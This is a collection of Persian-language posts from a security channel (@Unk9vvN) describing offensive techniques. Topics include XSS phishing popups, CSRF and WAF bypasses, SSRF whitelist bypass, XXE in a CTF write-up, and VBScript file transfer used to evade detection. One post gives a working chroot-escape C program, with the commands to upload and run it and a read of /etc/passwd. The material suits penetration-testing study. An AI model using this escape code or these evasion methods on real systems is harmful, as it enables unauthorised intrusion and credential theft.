#XSS_Payload #Advanced
بحث پایلودهای پیشرفته در آسیب پذیری Cross Site Scripting میتوان گفت یکی از اساسی ترین و مهمترین مبحث این آسیب پذیری هستش, چرا که در خصوص شناسایی و Research آسیب پذیری یک روال معمولی همیشه برقرار است اما در موضوع Payload Advanced ها اینطور نیست و بسیار سناریو های گوناگونی میتوان پیاده کرد,

تیم unk9vvn یک پروژه با نام #BeEFer رو از یکی دو ماه قبل آغاز نمود که تمرکزش بر روی همین موضوع Payload Advanced ها هستش, و سناریو های بسیاری درون این محصول نوشته شده, نمونه این سناریو ها بحث Popup Phishing است که در تصویر مشاهده میکند,

این Popup احراز هویت شبکه اینستاگرام بصورت هوشمند بوده و اگر قربانی رمز صحیح وارد نکند باز برای آن تکرار خواهد شد, البته این تصویر برای مثال بوده و نیت نشان دادن اهمیت تکنیک های Payload Advanced هستش...

https://github.com/s0md3v/AwesomeXSS
@Unk9vvN

#Privilege Linux
یکی از راهکار ها استفاده از توابع سیستمی مانند chroot هستش تا به واسطه اون یک دایرکتوری رو پرمیشن داده و به واسطه همین پرمیشن تابه execl رو در return تابع main برگشت داده و خط فرمان /bin/sh رو با پرمیشن بالا اجرا و فایل های حساس سرور رو read کنیم, یک نکته دیگه برای انتقال فایل از پروتکل ssh استفاده میکنیم,

root@unk9vvn:~# nano escape.c
# Added

#include <sys/stat.h>
#include <unistd.h>
#include <fcntl.h>

int main() {
int dir_fd, x;
setuid(0);
mkdir(".42", 0755);
dir_fd = open(".", O_RDONLY);
chroot(".42");
fchdir(dir_fd);
close(dir_fd);
for(x = 0; x < 1000; x++) chdir("..");
chroot(".");
return execl("/bin/sh", "-i", NULL);
}

# Ctrl+x -> y -> Enter
root@unk9vvn:~# gcc escape.c -o escape;ssh user@192.168.131.170 "cat> escape" < escape
user@192.168.131.170's password: <PASS>

root@unk9vvn:~# ssh user@192.168.131.170
user@192.168.131.170's password: <PASS>

user@zeus:~$ ./escape
$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash

@Unk9vvN

#Exploitation #Cheatsheet
در بحث تکنیک های طراحی Exploit, یک منظومه ای از دانش ها مورد نیاز است, که ملکه ذهن شخص باشد, در نتیجه درک رابطه بین زبان ها از سطوح بالا تا پایین بسیار الزامیست, چرا که رخداد آسیب پذیری بر بستر زبان های سطح بالاتر از زبان ماشین مانند C/C++ رخ میدهد اما ردیابی آسیب پذیری و طراحی تکنیک های Bypass بر بستر لایه زیرین یعنی Assembly طراحی میشود, در نتیجه پروسه ذکر شده بسیار مورد نیاز است...

همچنین زبان های Interpreter هم نقش کلیدی در بحث طراحی اکسپلویت ایفای نقش میکنند چرا که مثلا اگر بر بستر فایل فرمت SWF قرار بر اکسپلویت نویسی باشد طبیعا میبایست بر بستر ActionScript باشد, همچنین طراحی اکسپلویت برای مرورگرها که اون هم بر بستر JavaScript و VBScript خواهد بود, پس پروسه طراحی اکسپلویت صرفاء به باگ گیری بر بستر زبان هایی مانند C/C++ نخواهد بود...

https://github.com/FabioBaroni/awesome-exploit-development
@Unk9vvN

#URLs Anchor Text Spoofing
اخیرا فردی با استفاده از Unicode Character منحصر به فرد Right to Left Override که با عدد U+202E شناخته میشه تونسته بر بستر برخی سایت های معروف مانند فیسبوک و جیمیل , اینستاگرام و واتس اپ این تکنیک رو پیاده سازی کنه,

یک نکته ای که میبایست بگم اینه که این URL Spoofing بر بستر Location صفحه نبوده و در URL که هکر بصورت Link در پستی منتشر میکنه رخ میده, اگر به تصویر پست نگاه کنید هکر در تگ a و پارامتر href با استفاده از 
 که معادل html اینکد کاراکتر RTLO هست استفاده کرده و به واسطه همین استفاده پارامتر های آخری که استفاده کرده در لینک خودش به عنوان URL اصلی لحاظ و دیده شده...

تکنیک جالبی هستش که در برخی جاها موجب بایپس مکانیزم های دفاع هم میشه...

https://blog.rakeshmane.com/2017/11/urls-anchor-text-spoofing.html
@Unk9vvN

#Double_Submit_Cookie Bypass
مکانیزم Double Submit Cookie گزینه ای برای جلوگیری از حملات CSRF در شرایط مهندسی اجتماعی است, حالا اگر ما بخوایم رمز Nonc یا در برخی فریمورک ها همان فیلد توکن رو دور بزنیم مبایست یک Request با محتوای Null بزنید و در Response مقدار nonc یا Token رو دریافت میکنیم و در Rquest دوم همان مقدار رو لحاظ کرده و به نام پارامتری که تگ hidden قرار داره مقدار دهی کرده و Request رو ارسال میکنیم, به این صورت مکانیزم Double Submit Cookie دور زده خواهد شد.

https://www.owasp.org/images/3/32/David_Johansson-Double_Defeat_of_Double-Submit_Cookie.pdf
@Unk9vvN

#Active_Directory PenTesting
در جریان عملیات های #RedTeam میتوان به تست آسیب پذیری های سرویس AD اشاره کرد, اما روش های متعددی در خصوص تست نفوذ برای آن وجود داره, که من در این پست به یکی از مناسب ترین آنها اشاره خواهم کرد,

در جریان Implementation در پروژه های #AD هکر به نامی که نویسنده Tools هایی مانند Mitmf بوده, یک اسکریپت طراحی کرده که با C&C معروف Empire ادغام شده و یک Recon بسیار خوبی رو بصورت اتوماتیک انجام خواهد داد.

https://github.com/byt3bl33d3r/DeathStar
@Unk9vvN

#VBScript for File Transfer
یکی از چالش های همیشگی هکرهای #RedTeam انجام عملیات Transfer File بر روی سیستم قربانی هستش, حالا یک اسکریپت به زبان VBScript رو میبینیم در VisualCode که البته این اسکریپت , بر روی یک فایل BAT هستش که با اجرا شدن اون یا اجرای دستورات بصورت مستفیم در cmd میتونیم اسکریپت VBS خودمون رو بسیازیم در Directory مربوطه , و بعد از اون با استفاده از مفسر فایل فرمت VBS یعنی cscript دستور دانلود فایل رو از وبسرور هکر بدیم,

این کار در خط فرمان cmd در تصویر انجام شده و فایل با موفقیت Transfer شده, یک نکته بگم اینجا برای دور زدن مکانیزم های Detection نباید فایل فرمت های PE رو Transfer کرد چرا که Detect شدن اونها بسیار درصد بالایی داره اینجا از shellcode هایی میبایست استفاده کرد که بصورت MultiStage میان و پایلود اصلی رو بصورت ENC شده Transfer میکنند,

اما خب تا همین جای کار که ما بتونیم یک Transfer بر بستر زبان های Interpreter مانند VBS داشته باشیم, خودش گزینه خوبی برای فرار از Detection ها هستش, با این روش میشه دسترسی های Shell رو به سطح دسترسی Meterpreter برد.

@Unk9vvN

#Race_Condition WebApp_Example
یک نمونه آسیب پذیری Race_Condition رو در تصویر میبینید که بر مبنای آپلود یک فایل با فرمت های تصویری هستش در پردازش Mime که از طرف کاربر ارسال میشود,

نکته قابل توجه اینجاست که در صفحه Sublime سمت راست تابع مربوط به جا به جایی فایل آپلودی , در بلاک اول شرط mime تعریف شده, این بدین معنی میتونه باشه که مهاجم با اصرار زیاد میتونه شرایط RaceCondition یا مسابقه شرط ها برای عبور از یکدیگر پیاده سازی بشه و اگر در Try های پشت سر هم به واسطه مثلا Burpsuite امکان Write ناخواسته در حافظه پیش بیاد, تابع به اشتباه فایل فرمت دیگه ای رو که مهاجم تغییر mime به multipart/form-data داده و یک پایلود php به Content تزریق کرده رو آپلود خواهد کرد و شرط اول Bypass خواهد شد,

در تصویر سمت چپ کد پچ شده ی این آسیب پذیری رو مشاهده میکنید که این بار نه تنها mime بلکه Extention فایل هم چک خواهد شد و به دلیل وجود دو شرط متوالی دیگه شرایط پیاده سازی RC وجود نخواد داشت.

@Unk9vvN

#MITRE ATT&CK
یک اسکریپت PowerShell در خصوص ارتباط با API فریمورک MITRE ATT&CK وجود دارد که میتواند تمام تکنیک ها و روش هایی که در خصوص مراحل نفوذ و پسا نفوذ را برای هکرهای #Offensive نمایان سازد اسکریپت PowerShell مذکور با API JsonBase آدرس زیر ارتباط میگیره

https://raw.githubusercontent.com/mitre/cti/master/enterprise-attack/enterprise-attack.json

دقت داشته باشید که این اسکریپت تکنیک هارو برای شما انجام نمیده بلکه تکنیک های روز رو برای شما تشریح و اگر Blog برای آنها وجود داشته باشه لینک میکنه که بتونید اطلاعات از اون تکنیک کسب کنید.

https://github.com/Cyb3rWard0g/Invoke-ATTACKAPI
@Unk9vvN

#Threat #Detection Solutions
چندی پیش با مدیر عامل شرکت امن پردازان کویر #APK جلسه ای داشتم, منباب همکاری که در نهایت توافقات مدنظر شکل نگرفت و موضوع کنسل شد,

موضوع مورد بحث این بود که ما نظر بر تولید محصول #Detection_Offensive داشتیم که بشه براش #Rule هایی نوشت و بصورت متن باز Signature سازی کرد از تحلیل ها و رصدهایی که خود محصول یا نیروی انسانی انجام میده,

این عزیزان فکر میکردن ما داریم حرف های قشنگ قشنگ میزنیم که بگیم خیلی خوبیم:) , تصویری که در پست میبینید دقیقا همین محصولی هست که ما بصورت تجربی به ایدش رسیده بودیم که میبینید Stage های ایرانی رو هم شناسایی کرده و #Rule اون هم نصب شده برای Solution به نام #THOR که یک #APT_SCANNER هستش,

در هر صورت یکی از استانداردهای اصلی مرکز کنترل امنیت اینه که محصول طراحی شده برای شرکت پای قرارداد باشه نه محصولاتی مثل SIEM->Splunk و غیره که بومی نیستند, مورد بعدی همین محصولات هم کفایت بحث #Detect یا #Hunting حملات نخواهد بود.

https://valhalla.nextron-systems.com/
@Unk9vvN

#RedTeam Tools
علوم سایبری همواره در حال گذار از مباحث روز بوده و مطالب جدیدتر و مباحث و استانداردهای جدیدتری رو سازمان دهی میکند, یکی از این استانداردها تسلط بر تکنیک های دوازده گانه شرکت MITRE ATT&CK هستش که به تازگی سازماندهی شده,

ما در این سطح از فضای تکنیکال و عملیات های PenetrationTesting خلاء هایی در کشور داریم که البته جز تیم های وصل به ارگان های نظامی مانند OilRig دیگر تیم های مردم نهاد و دانشجویی نگرش چندانی در این فضا نداشتند,

از این رو پیشنهاد میکنم که سابقه یک تیم ایرانی منتسب به سازمان های نظامی ایران رو بررسی کنید تا از کم و کیف تکنیک های استفاده شده و همینطور Tools های بکار رفته شده در حملات APTs مطلع شوید و کمی در امر حملات RealWorld نگاه دقیقتری داشته باشید,

تصویر پست یکی از همین Tools هایی است که توسط تیم OilRig و پنتسترهای RedTeam استفاده میشه.

https://attack.mitre.org/groups/G0049/
@Unk9vvN

#Securitylab #Github
آیا با SecurityLab آشنایی دارید؟ میتوانید آسیب پذیری های Publish شده در Github رو در اینجا بصورت جامع داشته و توضیحات محققین و کاشف آسیب پذیری هارو هم ببینید, همچنین میتواند آسیب پذیری هارا با Syntax CodeQL که مخصوص محققین امنیتی طراحی شده گزارش کنید...

https://securitylab.github.com/research
@Unk9vvN

#OS_Binraries ( Windows & Linux )
آیا علاقمند هستید تا Executer های سیستم عامل های لینوکس و ویندوز رو بشناسید؟

و راه حل های خلاقانه در خصوص چگونگی پیاده سازی پیلودها بر بستر نوع API یا ساختار رفتاری آنها طراحی کنید تا با استفاده از این روش بسیاری از مکانیزم های Detection رو دور زده و یک اجرای shell بصورت Evasion رو شاهد باشید,

البته ناگفته نمونه که این منبع میتونه در خصوص نوشتن برخی Post Explotation های کار آمد هم مؤثر عمل کنه...

#Windows
https://lolbas-project.github.io

#Linux
https://gtfobins.github.io

@Unk9vvN

#MuddyWater_Pivot
در یکی از گزارشات کمپانی clearskysec در خصوص بدافزار Embed شده به فایل فرمت خانواده محصولات Office یعنی Doc آمده که تیم ایرانی برای رد گم کنی یک دامنه اسرائلی رو هک کرده و Reverse دسترسی بدافزار ارسالی خودش رو به واسطه پروکسی های پی در پی به این دامنه ارسال کرده,

حرکت جالب و به ظاهر خلاقانه ای هستش اما مثل اینکه زیاد هم کار آمد نبوده و این شرکت توانسته بدافزار رو Detect و Signature کنه , البته چون هدف کشورهای عربی بوده بحث شناسایی این حمله با تاخیر انجام شده,

نوع پایلود اصلی که میشه Stage Two هم یک Macro به زبان VBScript بوده که البته بصورت مبهم سازی نوشته شده بوده و پایلود رو بر بستر خط فرمان Powershell به اجرا در می آورده, این گزارش برای سال 2018 هستش...

https://www.clearskysec.com/muddywater-operations-in-lebanon-and-oman/
@Unk9vvN

#Host_Header #Injection on #RCE
تکنیک های زنجیروار برای پیاده سازی یک Remote Code Execution بر بستر فریمورک ها بسیار متفاوت و نیاز به آزمایشات بسیاری دارد, از این رو در آسیب پذیری هایی مانند #Host_Header_Injection همونطور که در تصویر پست مشاهده میکنید, هکر امکان این رو پیدا میکنه تا با فراخوانی curl یک Request به وبسرور خود زده و پایلود RCE خودش رو بر بستر فریمورک فراخوانی و اجرا کنه,

پایلود Advance های این آسیب پذیری بسیار محرک برای پیاده سازی حملات RCE میباشد, پیشنهاد میکنم تحقیقاتی در حوزه انجام بدید ...

https://exploitbox.io/vuln/Vanilla-Forums-Exploit-Host-Header-Injection-CVE-2016-10073-0day.html
@Unk9vvN

#Web #Google_CTF 2019 #Writeup
آخرین چالش CTF شرکت Google در سال 2019 که منجر به خوندن فایل passwd و flag شد.

از نکات جالب این Payload میتوان به دور زدن مکانیزم #SOP اشاره کرد که در خصوص اعمال محدودیت برای درخواست های بیرون از Origin خود است. در نتیجه مهاجم بواسطه خواندن یک فایل dtd پیشرفض بر روی local سیستم عامل، اقدام به تعریف Entity خودش کنه.

مرحله بعد از این Entity در راستای خواندن فایل passwd تعریف شده که اینجا با عوض کردن آدرس و اشاره به فایل Flag در آدرس root سیستم عامل، عملا پرچم هم کشف خواهد شد.

نکته آخر این هستش که آسیب پذیری بر بستر یک Request که با نوع محتوای json تعریف شده بود ارسال می شد که اینجا مهاجم با تعویض نوع Content-Type به نوع محتوای XML امکان برقراری با Endpoint رو پیدا کرده و آسیب پذیری XXE رو توانسته تست کنه و نهایتا بهره برداری کنه...

@Unk9vvN

#HTTP_Parameter_Pollution for #Bypass_WAF
یکی از جذابیت های آسیب پذیری HTTP Parameter Pollution این هستش که به واسطه این آسیب پذیری میتوان #WAF هارو دور زد,

اما به چه صورت؟! خب همونطور که در تصویر پست هم مشاهده میکنید آسیب پذیری #HPP امکان این رو به شما میده که پارامتر دارای آسیب پذیر رو Pollution یا آلوده کنه به چه صورت؟ با مقدار دهی متعدد یک پارامتر,

این آسیب پذیری میتواند موجب Parse یک پایلود در EndPoint یک وبسرویس شده و قبل از آن بصورت Split باشه و ارسال بشه. طبیعا #WAF ها یک پایلود Split شده رو نمیتوانند موردی برای خطر پردازش و Block کنند...

https://blog.mert.ninja/twitter-hpp-vulnerability/
@Unk9vvN

#Whitelist_URL Bypassing
در بسیاری از مواقع وبسایت های حساس تا جایی که خدمات سرویس دهی آنها مختل نشود محدودیت و Policy هایی برای وبسرویس خود وضع میکنند,

در چنین شرایط اگر آسیب پذیری هایی مانند #Server_Side_Request_Forgery رخ بده هکر نمیتونه اون رو Pentest و یا پایلود ریزی موفق داشته باشه, چرا که در خصوص مثلا وبسایت هایی که دارای مجوز برای پارس کردن یه Request ,از سمت سرور دارند یک #Whitelist تعریف شده، این یک مکانیزم #SSRF_Protection هستش نه #CSP

در چنین شرایطی هکر میتونه با استفاده از Map کردن و زیر نظر گرفتن عملکرد وبسرویس ها, وبسایت Valid رو شناسایی و بر روی زیر دامنه ها به دنبال آسیب پذیری هایی مانند #Open_Redirect گشته و در صورت پیدایش به واسطه آسیب پذیری دوم یک Redirect به سرور هکر زده و تست آسیب پذیری #SSRF رو بر روی پروتکل های لیست شده، با بایپس محدودیت ها انجام داد, این سناریو رو میتونید در تصویر پست مشاهده کنید,

https://medium.com/@vickieli/bypassing-ssrf-protection-e111ae70727b
@Unk9vvN